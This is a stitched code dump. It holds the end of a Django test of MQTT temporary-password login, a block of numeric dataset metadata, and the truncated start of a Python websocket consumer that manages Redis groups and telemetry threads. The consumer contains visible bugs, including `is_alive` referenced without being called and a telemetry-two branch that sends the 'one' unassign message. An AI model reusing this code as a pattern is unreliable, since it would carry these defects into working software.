password = TemporaryPassword.objects.get(user__username=username).password
self.assertEqual(check_password(password, encoded), True)
# logout
response = self.client.get('/en/auth/logout/', follow=True)
self.assertEqual(response.status_code, 200)
self.client.logout()
# mqtt login with correct temporary password
response = self.client.post('/en/auth/mqtt/login/',
{'username': 'admin',
'password': encoded},
follow=True)
self.assertEqual(response.status_code, 200)
# mqtt login with incorrect username
response = self.client.post('/en/auth/mqtt/login/',
{'username': 'admino',
'password': encoded},
follow=True)
self.assertEqual(response.status_code, 403)
# mqtt login with incorrect encoded password
response = self.client.post('/en/auth/mqtt/login/',
{'username': 'admin',
'password': encoded + 'r'},
follow=True)
self.assertEqual(response.status_code, 403)
# login as testuser1
username = 'testuser1'
client.login(username=username, password='top_secret')
# retrieve password hash
response = client.get('/en/api/user/{}/password/'.format(username),
follow=True)
self.assertEqual(response.status_code, 200)
encoded = JSONParser().parse(BytesIO(response.content))
# retrieve temporary password
password = TemporaryPassword.objects.get(user__username=username).password
self.assertEqual(check_password(password, encoded), True)
# logout
response = self.client.get('/en/auth/logout/', follow=True)
self.assertEqual(response.status_code, 200)
self.client.logout()
# mqtt login with correct temporary password
response = self.client.post('/en/auth/mqtt/login/',
{'username': username,
'password': encoded},
follow=True)
self.assertEqual(response.status_code, 200)
# mqtt login with incorrect username
response = self.client.post('/en/auth/mqtt/login/',
{'username': username + 'o',
'password': encoded},
follow=True)
self.assertEqual(response.status_code, 403)
# mqtt login with incorrect encoded password
response = self.client.post('/en/auth/mqtt/login/',
{'username': username,
'password': encoded + 'r'},
follow=True)
self.assertEqual(response.status_code, 403)
# login as testuser2
username = 'testuser2'
client.login(username=username, password='very_secret')
# retrieve password hash
response = client.get('/en/api/user/{}/password/'.format(username),
follow=True)
self.assertEqual(response.status_code, 200)
encoded = JSONParser().parse(BytesIO(response.content))
# retrieve temporary password
password = TemporaryPassword.objects.get(user__username=username).password
self.assertEqual(check_password(password, encoded), True)
# logout
response = self.client.get('/en/auth/logout/', follow=True)
self.assertEqual(response.status_code, 200)
self.client.logout()
# mqtt login with correct temporary password
response = self.client.post('/en/auth/mqtt/login/',
{'username': username,
'password': encoded},
follow=True)
self.assertEqual(response.status_code, 200)
# mqtt login with incorrect username
response = self.client.post('/en/auth/mqtt/login/',
{'username': username + 'o',
'password': encoded},
follow=True)
self.assertEqual(response.status_code, 403)
# mqtt login with incorrect encoded password
response = self.client.post('/en/auth/mqtt/login/',
{'username': username,
'password': encoded + 'r'},
follow=True)
self.assertEqual(response.status_code, 403)
| 43.298054
| 122
| 0.465539
| 2,911
| 35,591
| 5.626245
| 0.060804
| 0.088839
| 0.130602
| 0.131884
| 0.901697
| 0.88686
| 0.879656
| 0.876908
| 0.847478
| 0.831909
| 0
| 0.019491
| 0.419067
| 35,591
| 821
| 123
| 43.350792
| 0.772635
| 0.058638
| 0
| 0.804836
| 0
| 0
| 0.156297
| 0.036709
| 0
| 0
| 0
| 0.001218
| 0.17962
| 1
| 0.013817
| false
| 0.063903
| 0.018998
| 0
| 0.046632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
40594a785b412ae96d1974eac0bd502d6d1da9c8
| 339,966
|
py
|
Python
|
AT/consumers.py
|
seakers/daphne-brain
|
1d703d468cd503a21395f986dd72e67b6e556451
|
[
"MIT"
] | null | null | null |
AT/consumers.py
|
seakers/daphne-brain
|
1d703d468cd503a21395f986dd72e67b6e556451
|
[
"MIT"
] | null | null | null |
AT/consumers.py
|
seakers/daphne-brain
|
1d703d468cd503a21395f986dd72e67b6e556451
|
[
"MIT"
] | null | null | null |
import json
import redis
import schedule
import threading
import AT.global_objects as global_obj
from queue import Queue
from auth_API.helpers import get_user_information, get_or_create_user_information
from daphne_ws.consumers import DaphneConsumer
from AT.global_objects import frontend_to_hub_queue, userChannelNames, userChannelLayers
from asgiref.sync import async_to_sync
from AT.automated_at_routines.hub_routine import hub_routine
from AT.automated_at_routines.at_routine import anomaly_treatment_routine
from AT.simulator_thread.simulator_routine_by_false_eclss import simulate_by_dummy_eclss
from AT.simulator_thread.simulator_routine_by_real_eclss import handle_eclss_update
class ATConsumer(DaphneConsumer):
scheduler = schedule.Scheduler()
sched_stopper = None
kill_event = None
daphne_version = "AT"
##### WebSocket event handlers
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.queue = Queue()
def connect(self):
# First call function from base class, and then add the new behavior
super(ATConsumer, self).connect()
# Keep track of everyone that is on
r = redis.Redis()
r.sadd("all-users", self.channel_name)
if r.sismember("all-users", self.channel_name) == 1:
print(f"{self.channel_name} was successfully added to the all users group. The all users group contains "
f"{r.smembers('all-users')}")
else:
print(f"{self.channel_name} was not successfully added to the all users group.")
""" In the event daphne at needs to have all variables and queues cleared and threads killed
# Kill all the threads if they are running so that a stop message doesn't get left in the queue
if global_obj.sEclss_thread is not None:
if global_obj.sEclss_thread.is_alive():
global_obj.hub_to_sEclss_queue.put({'type': 'stop'})
if global_obj.sEclss_at_thread is not None:
if global_obj.sEclss_at_thread.is_alive():
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
if global_obj.simulator_threads[0] is not None:
if global_obj.simulator_threads[0].is_alive():
global_obj.hub_to_simulator_queues[0].put({'type': 'stop'})
if global_obj.simulator_at_threads[0] is not None:
if global_obj.simulator_at_threads[0].is_alive():
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
if global_obj.simulator_threads[1] is not None:
if global_obj.simulator_threads[1].is_alive():
global_obj.hub_to_simulator_queues[1].put({'type': 'stop'})
if global_obj.simulator_at_threads[1] is not None:
if global_obj.simulator_at_threads[1].is_alive():
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
if global_obj.simulator_threads[2] is not None:
if global_obj.simulator_threads[2].is_alive():
global_obj.hub_to_simulator_queues[2].put({'type': 'stop'})
if global_obj.simulator_at_threads[2] is not None:
if global_obj.simulator_at_threads[2].is_alive():
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
if global_obj.simulator_threads[3] is not None:
if global_obj.simulator_threads[3].is_alive():
global_obj.hub_to_simulator_queues[3].put({'type': 'stop'})
if global_obj.simulator_at_threads[3] is not None:
if global_obj.simulator_at_threads[3].is_alive():
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
# Clear all redis variables if no one is on
r.delete("seclss-group-users")
r.delete("fake-telemetry-one")
r.delete("fake-telemetry-two")
r.delete("fake-telemetry-three")
r.delete("fake-telemetry-four")
r.delete("all-users")
print("Cleared on redis variables.")
# Clear the queues and print a stop message, queues between hub and other threads get cleared in their threads
# But ensure all get cleared anyway to ensure everything starts on a clean slate
global_obj.frontend_to_hub_queue.queue.clear()
global_obj.sEclss_to_hub_queue.queue.clear()
global_obj.simulator_to_hub_queues[0].queue.clear()
global_obj.simulator_to_hub_queues[1].queue.clear()
global_obj.simulator_to_hub_queues[2].queue.clear()
global_obj.simulator_to_hub_queues[3].queue.clear()
global_obj.hub_to_sEclss_queue.queue.clear()
global_obj.hub_to_simulator_queues[0].queue.clear()
global_obj.hub_to_simulator_queues[1].queue.clear()
global_obj.hub_to_simulator_queues[2].queue.clear()
global_obj.hub_to_simulator_queues[3].queue.clear()
global_obj.hub_to_sEclss_at_queue.queue.clear()
global_obj.hub_to_simulator_at_queues[0].queue.clear()
global_obj.hub_to_simulator_at_queues[1].queue.clear()
global_obj.hub_to_simulator_at_queues[2].queue.clear()
global_obj.hub_to_simulator_at_queues[3].queue.clear()
global_obj.sEclss_at_to_hub_queue.queue.clear()
global_obj.simulator_at_to_hub_queues[0].queue.clear()
global_obj.simulator_at_to_hub_queues[1].queue.clear()
global_obj.simulator_at_to_hub_queues[2].queue.clear()
global_obj.simulator_at_to_hub_queues[3].queue.clear()
print("Cleared all queues.")"""
# Reset ping timer
signal = {'type': 'ws_configuration_update', 'content': None}
frontend_to_hub_queue.put(signal)
def disconnect(self, close_code):
r = redis.Redis()
# remove user from real telemetry group if they were in it
if r.sismember('seclss-group-users', self.channel_name) == 1:
# Check if both telemetry and at thread are not initialized
if global_obj.sEclss_thread is None and global_obj.sEclss_at_thread is None:
r.srem('seclss-group-users', self.channel_name)
async_to_sync(self.channel_layer.group_discard)("sEclss_group", self.channel_name)
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
# Check if only telemetry thread is not initialized
elif global_obj.sEclss_thread is None:
# Check if at thread is alive, then kill that thread
if global_obj.sEclss_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
if r.scard("seclss-group-users") == 0:
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
# Ensure it gets stopped
global_obj.sEclss_at_thread.join(2.0)
# If not successful send back error message
if global_obj.sEclss_at_thread.is_alive():
print('There was an error stopping real at thread.')
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
# If it is not alive then it is already stopped, send back success
else:
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
# Check if only telemetry thread is not initialized
elif global_obj.sEclss_at_thread is None:
# Check if telemetry thread is alive, then kill that thread
if global_obj.sEclss_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
if r.scard("seclss-group-users") == 0:
global_obj.hub_to_sEclss_queue.put({'type': 'stop'})
# Ensure it gets stopped
global_obj.sEclss_thread.join(2.0)
# If not successful send back error message
if global_obj.sEclss_thread.is_alive():
print('There was an error stopping real telemetry thread.')
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
# If it is not alive then it is already stopped, send back success
else:
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
# Check if both have been initialized
else:
# Check if both are alive then kill both
if global_obj.sEclss_thread.is_alive() and global_obj.sEclss_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
# If no more users are listening to the real telemetry then stop it
if r.scard("seclss-group-users") == 0:
global_obj.frontend_to_hub_queue.put({'type': 'stop_real_telemetry'})
# Ensure that the thread stops
global_obj.sEclss_thread.join(2.0)
if global_obj.sEclss_thread.is_alive():
print('There was an error stopping the real telemetry thread.')
global_obj.sEclss_at_thread.join(2.0)
if global_obj.sEclss_at_thread.is_alive():
print('There was an error stopping the real at thread.')
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
# Check if only sEclss thread is alive
elif global_obj.sEclss_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
if r.scard("seclss-group-users") == 0:
global_obj.hub_to_sEclss_queue.put({'type': 'stop'})
# Ensure it gets stopped
global_obj.sEclss_thread.join(2.0)
# If not successful send back error message
if global_obj.sEclss_thread.is_alive():
print('There was an error stopping real telemetry thread.')
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
# Check if only at thread is alive
elif global_obj.sEclss_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
if r.scard("seclss-group-users") == 0:
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
# Ensure it gets stopped
global_obj.sEclss_at_thread.join(2.0)
# If not successful send back error message
if global_obj.sEclss_at_thread.is_alive():
print('There was an error stopping real at thread.')
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
# Check if both are not running
else:
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
elif r.sismember('hera-group-users', self.channel_name) == 1:
# Check if both telemetry and at thread are not initialized
if global_obj.hera_thread is None and global_obj.hera_at_thread is None:
r.srem('hera-group-users', self.channel_name)
async_to_sync(self.channel_layer.group_discard)("hera_group", self.channel_name)
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
# Check if only telemetry thread is not initialized
elif global_obj.hera_thread is None:
# Check if at thread is alive, then kill that thread
if global_obj.hera_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
if r.scard("hera-group-users") == 0:
global_obj.hub_to_hera_at_queue.put({'type': 'stop'})
# Ensure it gets stopped
global_obj.hera_at_thread.join(2.0)
# If not successful send back error message
if global_obj.hera_at_thread.is_alive():
print('There was an error stopping hera at thread.')
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
# If it is not alive then it is already stopped, send back success
else:
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
# Check if only telemetry thread is not initialized
elif global_obj.hera_at_thread is None:
# Check if telemetry thread is alive, then kill that thread
if global_obj.hera_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
if r.scard("hera-group-users") == 0:
global_obj.hub_to_hera_queue.put({'type': 'stop'})
# Ensure it gets stopped
global_obj.hera_thread.join(2.0)
# If not successful send back error message
if global_obj.hera_thread.is_alive():
print('There was an error stopping hera telemetry thread.')
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
# If it is not alive then it is already stopped, send back success
else:
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
# Check if both have been initialized
else:
# Check if both are alive then kill both
if global_obj.hera_thread.is_alive() and global_obj.hera_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
# If no more users are listening to the real telemetry then stop it
if r.scard("hera-group-users") == 0:
global_obj.frontend_to_hub_queue.put({'type': 'stop_real_telemetry'})
# Ensure that the thread stops
global_obj.hera_thread.join(2.0)
if global_obj.hera_thread.is_alive():
print('There was an error stopping the hera telemetry thread.')
global_obj.hera_at_thread.join(2.0)
if global_obj.hera_at_thread.is_alive():
print('There was an error stopping the hera at thread.')
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
# Check if only sEclss thread is alive
elif global_obj.hera_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
if r.scard("hera-group-users") == 0:
global_obj.hub_to_hera_queue.put({'type': 'stop'})
# Ensure it gets stopped
global_obj.hera_thread.join(2.0)
# If not successful send back error message
if global_obj.hera_thread.is_alive():
print('There was an error stopping hera telemetry thread.')
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
# Check if only at thread is alive
elif global_obj.hera_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
if r.scard("hera-group-users") == 0:
global_obj.hub_to_hera_at_queue.put({'type': 'stop'})
# Ensure it gets stopped
global_obj.hera_at_thread.join(2.0)
# If not successful send back error message
if global_obj.hera_at_thread.is_alive():
print('There was an error stopping real at thread.')
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
# Check if both are not running
else:
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
# remove the user from the fake telemetry group if they were in one
elif r.sismember('fake-telemetry-one', self.channel_name) == 1:
# Check if both simulator and at threads are not initialized
if global_obj.simulator_threads[0] is None and global_obj.simulator_at_threads[0] is None:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
# Check if only simulator thread is not initialized
elif global_obj.simulator_threads[0] is None:
# Check if at thread is alive, then kill that thread
if global_obj.simulator_at_threads[0].is_alive():
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_at_threads[0].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[0].is_alive():
print('There was an error stopping fake at thread one.')
# Unassign anyway
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
# If it is not alive then it is already stopped
else:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
# Check if only at thread is not initialized
elif global_obj.simulator_at_threads[0] is None:
# Check if simulator thread is alive, then kill that thread
if global_obj.simulator_threads[0].is_alive():
global_obj.hub_to_simulator_queues[0].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_threads[0].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[0].is_alive():
print('There was an error stopping fake simulator thread one.')
# unassign anyway
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
# If it is not alive then it is already stopped
else:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
# Check if both have been initialized
else:
# Check if both are alive, then kill both
if global_obj.simulator_threads[0].is_alive and global_obj.simulator_at_threads[0].is_alive():
global_obj.frontend_to_hub_queue.put({'type': 'stop_fake_telemetry_one'})
# Ensure it gets stopped
global_obj.simulator_threads[0].join(2.0)
if global_obj.simulator_threads[0].is_alive():
print('There was an error stopping fake telemetry thread one.')
global_obj.simulator_at_threads[0].join(2.0)
if global_obj.simulator_at_threads[0].is_alive():
print('There was an error stopping fake at thread one.')
# Unassign anyway
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
# Check if only simulator thread is alive, then only kill simulator thread
elif global_obj.simulator_threads[0].is_alive():
global_obj.hub_to_simulator_queues[0].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_threads[0].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[0].is_alive():
print('There was an error stopping fake simulator thread one.')
# Unassign anyway
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
# Check if only at thread is alive, then only kill at thread
elif global_obj.simulator_at_threads[0].is_alive():
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_at_threads[0].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[0].is_alive():
print('There was an error stopping fake at thread one.')
# Unassign anyway
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
# Check if both are dead then unassign
else:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
elif r.sismember('fake-telemetry-two', self.channel_name) == 1:
# Check if both simulator and at threads are not initialized
if global_obj.simulator_threads[1] is None and global_obj.simulator_at_threads[1] is None:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
# Check if only simulator thread is not initialized
elif global_obj.simulator_threads[1] is None:
# Check if at thread is alive, then kill that thread
if global_obj.simulator_at_threads[1].is_alive():
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_at_threads[1].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[1].is_alive():
print('There was an error stopping fake at thread two.')
# Unassign anyway
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
# If it is not alive then it is already stopped
else:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
# Check if only at thread is not initialized
elif global_obj.simulator_at_threads[1] is None:
# Check if simulator thread is alive, then kill that thread
if global_obj.simulator_threads[1].is_alive():
global_obj.hub_to_simulator_queues[1].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_threads[1].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[1].is_alive():
print('There was an error stopping fake simulator thread two.')
# unassign anyway
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
# If it is not alive then it is already stopped
else:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
# Check if both have been initialized
else:
# Check if both are alive, then kill both
if global_obj.simulator_threads[1].is_alive and global_obj.simulator_at_threads[1].is_alive():
global_obj.frontend_to_hub_queue.put({'type': 'stop_fake_telemetry_two'})
# Ensure it gets stopped
global_obj.simulator_threads[1].join(2.0)
if global_obj.simulator_threads[1].is_alive():
print('There was an error stopping fake telemetry thread two.')
global_obj.simulator_at_threads[1].join(2.0)
if global_obj.simulator_at_threads[1].is_alive():
print('There was an error stopping fake at thread two.')
# Unassign anyway
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
# Check if only simulator thread is alive, then only kill simulator thread
elif global_obj.simulator_threads[1].is_alive():
global_obj.hub_to_simulator_queues[1].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_threads[1].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[1].is_alive():
print('There was an error stopping fake simulator thread two.')
# Unassign anyway
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
# Check if only at thread is alive, then only kill at thread
elif global_obj.simulator_at_threads[1].is_alive():
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_at_threads[1].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[1].is_alive():
print('There was an error stopping fake at thread two.')
# Unassign anyway
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
# Check if both are dead then unassign
else:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
elif r.sismember('fake-telemetry-three', self.channel_name) == 1:
# Check if both simulator and at threads are not initialized
if global_obj.simulator_threads[2] is None and global_obj.simulator_at_threads[2] is None:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
# Check if only simulator thread is not initialized
elif global_obj.simulator_threads[2] is None:
# Check if at thread is alive, then kill that thread
if global_obj.simulator_at_threads[2].is_alive():
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_at_threads[2].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[2].is_alive():
print('There was an error stopping fake at thread three.')
# Unassign anyway
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
# If it is not alive then it is already stopped
else:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
# Check if only at thread is not initialized
elif global_obj.simulator_at_threads[2] is None:
